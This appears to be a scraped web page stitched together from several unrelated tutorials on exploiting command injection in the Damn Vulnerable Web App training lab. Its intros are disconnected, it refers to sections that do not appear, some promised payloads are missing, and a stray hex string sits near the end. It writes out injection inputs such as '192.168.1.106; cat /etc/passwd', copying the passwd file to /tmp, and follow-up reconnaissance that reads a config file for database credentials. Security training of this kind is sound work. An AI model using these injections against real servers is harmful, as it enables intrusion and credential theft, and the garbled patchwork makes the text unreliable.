In preparation for a new web security training course (german, coming soon), I had another look at the current version of the Damn Vulnerable Web App (DVWA). As I documented the solution for the command injection vulnerability on high, I found something that sparked a tiny idea how this part might be exploited in a totally different way. Obviously I had to investigate further and since I didn't see this solution out there already, I documented it here for anyone who's interested.
DVWA : Command Execution Vulnerability
Now on the medium security security level, dvwa starts limiting the options by filtering out certain characters, i.e. && and ;. It's still easy enough to exploit, for example by using only one & or one of the numerous other chars that let us chain commands. I wanted to see, whether the $ char could be used for mischief on its own without using parentheses ($(command)) and came up with the following idea for medium.
Now that is the intended way to exploit DVWA on high. I was curious however, whether this vulnerability can be exploited to execute system commands by using some of the remaining characters that haven't been filtered out, especially ', ", > and ?
Not much to say here, it was fun tinkering around with a vulnerability that I thought I knew already and finding a new way to exploit it. As I said, the include construct requires allow_url_include to be set in order to include remote sources, so this is not a sure fire way of exploiting a faulty command execution feature. Nevertheless, I learned a new approach to this type of vulnerability and I hope other have too by reading this. If you have questions or additional ideas, I'm all ears. Best tweet me @hashtagsecurity or us @LastBreach.
Command Injection is the most dangerous web application vulnerability (rated mostly 9-10.0/10.0 in CVS Score) that allows an attacker to run any arbitrary OS command on host Operating System using vulnerable web application. This vulnerability is also referred with various other names like OS injection, OS command injection, shell injection, shell command injection, etc.
As we know, the main reason of command injection vulnerability is improper input validation. So major way to protect it is by implementing proper input validation on the input given by the user from client as well server ends. Some of the other techniques are:
We got the same page as we had in low level challenge. Again, we will follow the same general steps for finding command injection vulnerability. Again, enter the loopback IP address and click on Submit button to check the functionality of the application.
Again, we got the same page as we had in low and medium level. Again, we will follow the same general steps for finding command injection vulnerability. So, click on Submit button by entering loopback address to check the functionality of the application.
Execute Ping Notes:Below we are going to do a simply ping test using the web interface.
As an example, ping something on your network.
Use the IP Address obtained in Section 3, Step 3 if you have nothing else to ping.
Instructions:192.168.1.106
Click Submit
cat /etc/password (Attempt 1) Instructions:cat /etc/passwd
Click Submit
Notes:
Notice that either a messaging saying illegal IP address was displayed or nothing was returned.
cat /etc/password (Attempt 2) Instructions:192.168.1.106; cat /etc/passwd
Click Submit
Notes:
Notice that we are now able to see the contents of the /etc/passwd file.
Looking at the weakness Instructions:Bring up a terminal window (See Section 3, Step 1, if you don't know how)
cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
Notes:Notice the two shell_exec lines.
These are the lines that execute ping depending on which Operating System is being used.
In Unix/Linux command, you can run multiple command separated by a ";".
Notice the code does not check that if $target matches an IP Address\d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of multiple digits, like 192.168.1.106.
The code allows for an attacker to append commands behind the IP Address.192.168.1.106; cat /etc/passwd
Copy the /etc/passwd file to /tmpInstructions:192.168.1.106; cat /etc/passwd tee /tmp/passwd
Note:Here we are not only displaying the contents of /etc/passwd on the webpage, but also we are copying the /etc/passwd file to the /tmp directory.
Command injection is an attack in which the goal is execution ofarbitrary commands on the host operating system via a vulnerableapplication. Command injection attacks are possible when an applicationpasses unsafe user supplied data (forms, cookies, HTTP headers etc.) toa system shell. In this attack, the attacker-supplied operating systemcommands are usually executed with the privileges of the vulnerableapplication. Command injection attacks are possible largely due toinsufficient input validation.
The environment plays a powerful role in the execution of systemcommands within programs. Functions like system() and exec() use theenvironment of the program that calls them, and therefore attackers havea potential opportunity to influence the behavior of these calls.
User Credentials ExplorationNotes(FYI):Note you will not see an actual command prompt, but you do have shell access.
Instructions:whoamiThis command prints the username for the effective userid.
If the username was root, then we would be in full control; however, the username is apache.
grep apache /etc/passwdHere I am checking if the username is allowed to login remotely.
When a shell is set to /sbin/nologin, then that user cannot login remotely.
grep apache /etc/groupIt is important to discover other additional groups that apache might belong to.
In this case, apache is pretty well protected.
Explore Process and Directory Credentials.Instructions:ps -eaf grep httpTypically, the Apache web server processes will run with a daemon called httpd.
pwdPrint the current working directory.
This actually tells us a lot. It tell us the exact path of where the NetCat command was executed from in Section 6, Step 2.
ls -ld /var/www/htmlIn Fedora, the "DocumentRoot" path is typically /var/www/html.
If this directory was owned by apache instead of root we could do some web graffiti and many other things.
ls -ld /var/www/html/dvwaThe parent directory for the DVWA is /var/www/html/dvwa.
Unfortunately, the apache username only has world read and execute permissions.
ls -l /var/www/html/dvwaNow we are going to explore the contents of the DVWA directory.
Notice, there is a config directory.
Config directories are important because they contain database credential information.
Database Credential ExplorationInstructions:ls -l /var/www/html/dvwa/configWe are shown there is a configuration file with a permission problem.
The config.inc.php problem is that its' permissions are set to 644, meaning that anyone can read this file.
cat /var/www/html/dvwa/config/config.inc.phpBingo!!!
For the database name dvwa, the user is root and the password is dvwaPASSWORD.
In thispost, we are going to use command injection vulnerability to gain access to thetarget web server through a reverse shell and we will also be covering how tosecure your web server against this type of attack?
Step 1. In order to ensure that the application is vulnerable to command execution we can try a simple command. command injection is a technique used via a web interface in order to execute OS commands on a web server. By using this Damn Vulnerable Web Application (DVWA), it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string.
Code execution vulnerabilities are allowing us to execute operating system commands on the web server. In this case, we will work with Linux commands since the target server is Linux Metasploitable. There is a pinging tab in the menu. As it can be seen, this section of the website is supposed to ping websites in this section as it is pinged from a command prompt.
I was still able to leverage the command injection to compromise not just the server, but the entire infrastructure it was running on. After the dust settled, the critical report was made, and the vulnerability was closed, I thought the entire attack path was kind of fun, and decided to share how I went about it. 2ff7e9595c
Comentários